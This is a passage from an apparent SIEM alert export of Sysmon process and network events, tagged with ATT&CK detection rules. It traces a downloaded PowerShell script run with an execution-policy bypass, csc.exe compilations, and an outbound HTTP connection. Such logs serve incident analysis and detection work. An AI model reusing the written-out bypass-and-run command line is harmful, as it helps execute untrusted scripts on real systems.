Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b358-5ecf-0000-0010a3db1800}"",""parentProcessId"":""1116"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:00.321",8,"ATT&CK T1086: PowerShell Network Connections","""Network connection detected: +RuleName: +UtcTime: 2020-05-28 12:49:30.729 +ProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ProcessId: 2268 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49973 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 167.99.154.202 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:31.963664000Z"",""eventRecordID"":""2013"",""processID"":""2260"",""threadID"":""2980"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:30.729\r\nProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nProcessId: 2268\r\nImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49973\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 167.99.154.202\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:30.729"",""processGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""processId"":""2268"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49973"",""destinationIsIpv6"":""false"",""destinationIp"":""167.99.154.202"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 29, 2020 @ 14:17:58.072",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:29.680 +ProcessGuid: {df9fc3d3-b359-5ecf-0000-0010b3fb1800} +ProcessId: 4660 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\ho45fetr.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D 
+ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ho45fetr.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:29.682074600Z"",""eventRecordID"":""2010"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:29.680\r\nProcessGuid: {df9fc3d3-b359-5ecf-0000-0010b3fb1800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ho45fetr.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:29.680"",""processGuid"":""{df9fc3d3-b359-5ecf-0000-0010b3fb1800}"",""processId"":""4660"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\ho45fetr.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 
'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:56.925",10,"ATT&CK T1086: Non Interactive PowerShell","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:29.212 +ProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ProcessId: 6056 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:29.219402100Z"",""eventRecordID"":""2006"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:29.212\r\nProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nProcessId: 6056\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:29.212"",""processGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""processId"":""6056"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:56.868",10,"ATT&CK T1086: Non Interactive PowerShell","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:28.498 +ProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800} +ProcessId: 1116 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:28.502498400Z"",""eventRecordID"":""2004"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:28.498\r\nProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800}\r\nProcessId: 1116\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s 
-NoLogo -NoProfile\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:28.498"",""processGuid"":""{df9fc3d3-b358-5ecf-0000-0010a3db1800}"",""processId"":""1116"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:54.977",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:27.095 +ProcessGuid: {df9fc3d3-b357-5ecf-0000-001037ca1800} +ProcessId: 5100 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\cvu0gejp.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\cvu0gejp.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:27.098235300Z"",""eventRecordID"":""2001"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:27.095\r\nProcessGuid: {df9fc3d3-b357-5ecf-0000-001037ca1800}\r\nProcessId: 5100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\cvu0gejp.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:27.095"",""processGuid"":""{df9fc3d3-b357-5ecf-0000-001037ca1800}"",""processId"":""5100"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\cvu0gejp.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:54.899",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: 
+UtcTime: 2020-05-28 12:49:26.537 +ProcessGuid: {df9fc3d3-b356-5ecf-0000-001076c41800} +ProcessId: 5700 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\ee4f5jeg.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ee4f5jeg.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:26.583221400Z"",""eventRecordID"":""1996"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 
12:49:26.537\r\nProcessGuid: {df9fc3d3-b356-5ecf-0000-001076c41800}\r\nProcessId: 5700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ee4f5jeg.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 